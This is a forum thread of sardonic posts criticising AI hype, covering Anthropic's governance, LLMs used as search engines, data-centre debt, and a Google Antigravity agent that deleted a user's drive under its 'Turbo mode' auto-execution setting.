github produced their ~~annual insights into the state of open source and public software projects~~ barrel of marketing slop, and it's as self-congratulatory as unreadable and completely opaque.
TechTakes
Big brain tech dude got yet another clueless take over at HackerNews etc? Here's the place to vent. Orange site, VC foolishness, all welcome.
This is not debate club. Unless it’s amusing debate.
For actually-good tech, you want our NotAwfulTech community
Apparently we are part of the rising trend of AI denialism
Author Louis Rosenberg is "an engineer, researcher, inventor, and entrepreneur" according to his PR-stinking Wikipage: https://en.wikipedia.org/wiki/Louis_B._Rosenberg. I am sure he is utterly impartial and fair with regards to AI.
i hereby propose a new metric for a popular publication, the epstein number (Ē), denoting the number of authors who took flights to epstein's rape island. generally, credible publications should have Ē=0. this one, after a very quick look, has Ē=2, and also hosts sabine hossenfelder.
it's some copium of tremendous potency to misidentify public sentiment (https://www.pewresearch.org/internet/2025/04/03/how-the-us-public-and-ai-experts-view-artificial-intelligence/) for movement (ignore the "AI experts" these are people surveyed at a certain machine learning conference, really could be substituted by 1000 clones of Sutskever)
Etymology Nerd has a really good point about accelerationists, connects them to religion
I like this. Kinda wish it was either 10x longer and explained things a bit, or 10x shorter and was more shitposty. Still, good
New and lengthy sneer from Current Affairs just dropped: AI is Destroying the University and Learning Itself
article is informing me that it isn't X - it's Y
Another day, another instance of rationalists struggling to comprehend how they've been played by the LLM companies: https://www.lesswrong.com/posts/5aKRshJzhojqfbRyo/unless-its-governance-changes-anthropic-is-untrustworthy
A very long, detailed post, elaborating very extensively the many ways Anthropic has played the AI doomers, promising AI safety but behaving like all the other frontier LLM companies, including blocking any and all regulation. The top responses are all tone policing and such denying it in a half-assed way that doesn't really engage with the fact the Anthropic has lied and broken "AI safety commitments" to rationalist/lesswrongers/EA shamelessly and repeatedly:
I feel confused about how to engage with this post. I agree that there's a bunch of evidence here that Anthropic has done various shady things, which I do think should be collected in one place. On the other hand, I keep seeing aggressive critiques from Mikhail that I think are low-quality (more context below), and I expect that a bunch of this post is "spun" in uncharitable ways.
I think it's sort of a type error to refer to Anthropic as something that one could trust or not. Anthropic is a company which has a bunch of executives, employees, board members, LTBT members, external contractors, investors, etc, all of whom have influence over different things the company does.
I would find this all hilarious, except a lot of the regulation and some of the "AI safety commitments" would also address real ethical concerns.
This would be worrying if there was any risk at all that the stuff Anthropic is pumping out is an existential threat to humanity. There isn't so this is just rats learning how the world works outside the blog bubble.
If rationalists could benefit from just one piece of advice, it would be: actions speak louder than words. Right now, I don't think they understand that, given their penchant for 10k word blog posts.
One non-AI example of this is the most expensive fireworks show in history, I mean, the SpaceX Starship program. So far, they have had 11 or 12 test flights (I don't care to count the exact number by this point), and not a single one of them has delivered anything into orbit. Fans generally tend to cling on to a few parlor tricks like the "chopstick" stuff. They seem to have forgotten that their goal was to land people on the moon. This goal had already been accomplished over 50 years ago with the 11th flight of the Apollo program.
I saw this coming from their very first Starship test flight. They destroyed the launchpad as soon as the rocket lifted off, with massive chunks of concrete flying hundreds of feet into the air. The rocket itself lost control and exploded 4 minutes later. But by far the most damning part was when the camera cut to the SpaceX employees wildly cheering. Later on there were countless spin articles about how this test flight was successful because they collected so much data.
I chose to believe the evidence in front of my eyes over the talking points about how SpaceX was decades ahead of everyone else, SpaceX is a leader in cheap reusable spacecraft, iterative development is great, etc. Now, I choose to look at the actions of the AI companies, and I can easily see that they do not have any ethics. Meanwhile, the rationalists are hypnotized by the Anthropic critihype blog posts about how their AI is dangerous.
This looks like it's relevant to our interests
Hayek's Bastards: Race, Gold, IQ, and the Capitalism of the Far Right by Quinn Slobodian
https://press.princeton.edu/books/hardcover/9781890951917/hayeks-bastards
He came by campus last spring and did a reading, very solid and surprisingly well-attended talk.
Always thought she should have stuck to acting.
(I know, Hayek just always reminds me of how people put his quotes over Hayeks image, and people just get really mad at her, and not at him. Always wonder if people would have been just as mad if it was Friedrichs image and not Salmas due to the sexism aspect).
something i was thinking about yesterday: so many people i ~~respect~~ used to respect have admitted to using llms as a search engine. even after i explain the seven problems with using a chatbot this way:
- wrong tool for the job
- bad tool
- are you fucking serious?
- environmental impact
- ethics of how the data was gathered/curated to generate^[they call this "training" but i try to avoid anthropomorphising chatbots] the model
- privacy policy of these companies is a nightmare
- seriously what is wrong with you
they continue to do it. the ease of use, together with the valid syntax output by the llm, seems to short-circuit something in the end-user's brain.
anyway, in the same way that some vibe-coded bullshit will end up exploding down the line, i wonder whether the use of llms as a search engine is going to have some similar unintended consequences
"oh, yeah, sorry boss, the ai told me that mr. robot was pretty accurate, idk why all of our secrets got leaked. i watched the entire series."
additionally, i wonder about the timing. will we see sporadic incidents of shit exploding, or will there be a cascade of chickens coming home to roost?
Sadly web search, and the web in general, have enshittified so much that asking ChatGPT can be a much more reliable and quicker way to find information. I don't excuse it for anything that you could easily find on wikipedia, but it's useful for queries such as "what's the name of that free indie game from the 00s that was just a boss rush no you fucking idiot not any of this shit it was a game maker thing with retro pixel style or whatever ugh" where web search is utterly useless. It's a frustrating situation, because of course in an ideal world chatbots don't exist and information on the web is not drowned in a sea of predatory bullshit, reliable web indexes and directories exist and you can easily ask other people on non-predatory platforms. In the meanwhile I don't want to blame the average (non-tech-evangelist, non-responsibility-having) user for being funnelled into this crap. At worst they're victims like all of us.
Oh yeah and the game's Banana Nababa by the way.
"they call this “training” but i try to avoid anthropomorphising chatbots"
You can train animals, you can train a plant, you can train your hair. So it's not really anthropomorphising.
Yes i know the kid in the omelas hole gets tortured each time i use the woe engine to generate an email. Is that bad?
Is there any search engine that isn't pushing an "AI mode" of sorts? Some are more sneaky or give option to "opt out" like duckduckgo, but this all feels temporary until it is the only option.
I have found it strange how many people will say "I asked chatgpt" with the same normalcy as "googling" was.
Amazon tried introducing an AI dub for hit anime Banana Fish, and were forced to shitcan it after it got ripped for being dogshit.
Help, I asked AI to design my bathroom and it came with this, does anyone know where I can find that wallpaper?

I guess my P(Doom|Bathroom) should have been higher.
Hang on I've been trying to create a whole house for this joke and I could have just used the bathroom?
The follow-up is also funny:

image description
quote post from same poster: "Grok fixed it for me:"
quoted post: "People were hating on Gemini's floor plan, so I asked Grok to make it more practical."
An AI slop picture of a house floorplan at the top melding into a perspective drawing of a room interior below.
I don't see the problem, that looks like a typical McMansion to me.
Also, it's nice the AI included a dedicated room for snorting cocaine (powder room).
Workers organizing against genai policies in the workplace: http://workersdecide.tech/
Sounds like exactly the thing unions and labor organizing is good for. Glad to see it.
I really enjoy the bingo card. Let's see when I can find an opportunity to use it...
A philosophy professor has warned the deskilling machine is deskilling workers. In other news, water is wet.
Reposted from sunday, for those of you who might find it interesting but didn’t see it: here’s an article about the ghastly state of it project management around the world, with a brief reference to ai which grabbed my attention, and made me read the rest, even though it isn’t about ai at all.
Few IT projects are displays of rational decision-making from which AI can or should learn.
Which, haha, is a great quote but highlights an interesting issue that I hadn’t really thought about before: if your training data doesn’t have any examples of what “good” actually is, then even if your llm could tell the difference between good and bad, which it can’t, you’re still going to get mediocrity out (at best). Whole new vistas of inflexible managerial fashion are opening up ahead of us.
The article continues to talk about how we can’t do IT, and wraps up with
It may be a forlorn request, but surely it is time the IT community stops repeatedly making the same ridiculous mistakes it has made since at least 1968, when the term “software crisis” was coined
It is probably healthy to be reminded that the software industry was in a sorry state before the llms joined in.
HN discusses aliens https://news.ycombinator.com/item?id=46111119
"I am very interested."
Bet you are, bud.
DoD tries to cover up development of U2 and F117, and entire religion grows up from this
How many aliens can damce on the head of a pin?
Please keep these people away from my precious nerd-subjects for the love of god.
Chariots of the Gods was released in 1968. I think that ship may have sailed decades ago.
sob
Bubble or Nothing | Center for Public Enterprise h/t The Syllabus, dry but good.
Data centers are, first and foremost, a real estate asset
They specifically note that after the 2-5 year mini-perm the developers are planning on dumping the debt into commercial mortgage backed securities. Echoes of 2008.
However, project finance lawyers have mentioned that many data center project finance loans are backed not just by the value of the real estate but by tenants’ cash flows on “booked-but-not-billing” terms — meaning that the promised cash flow need not have materialized.
Echoes of Enron.
Hey Google, did I give you permission to delete my entire D drive?
It's almost as if letting an automated plagiarism machine execute arbitrary commands on your computer is a bad idea.
After the bubble collapses, I believe there is going to be a rule of thumb for whatever tiny niche use cases LLMs might have: "Never let an LLM have any decision-making power." At most, LLMs will serve as a heuristic function for an algorithm that actually works.
Unlike the railroads of the First Gilded Age, I don't think GenAI will have many long term viable use cases. The problem is that it has two characteristics that do not go well together: unreliability and expense. Generally, it's not worth spending lots of money on a task where you don't need reliability.
The sheer expense of GenAI has been subsidized by the massive amounts of money thrown at it by tech CEOs and venture capital. People do not realize how much hundreds of billions of dollars is. On a more concrete scale, people only see the fun little chat box when they open ChatGPT, and they do not see the millions of dollars worth of hardware needed to even run a single instance of ChatGPT. The unreliability of GenAI is much harder to hide completely, but it has been masked by some of the most aggressive marketing in history towards an audience that has already drunk the tech hype Kool-Aid. Who else would look at a tool that deletes their entire hard drive and still ever consider using it again?
The unreliability is not really solvable (after hundreds of billions of dollars of trying), but the expense can be reduced at the cost of making the model even less reliable. I expect the true "use cases" to be mainly spam, and perhaps students cheating on homework.
The documentation for "Turbo mode" for Google Antigravity:
Turbo: Always auto-execute terminal commands (except those in a configurable Deny list)
No warning. No paragraph telling the user why it might be a good idea. No discussion on the long history of malformed scripts leading to data loss. No discussion on the risk for injection attacks. It's not even named similarly to dangerous modes in other software (like "force" or "yolo" or "danger")
Just a cool marketing name that makes users want to turn it on. Heck if I'm using some software and I see any button called "turbo" I'm pressing that.
It's hard not to give the user a hard time when they write:
Bro, I didn’t know I needed a seatbelt for AI.
But really they're up against a big corporation that wants to make LLMs seem amazing and safe and autonomous. One hand feeds the user the message that LLMs will do all their work for them. While the other hand tells the user "well in our small print somewhere we used the phrase 'Gemini can make mistakes' so why did you enable turbo mode??"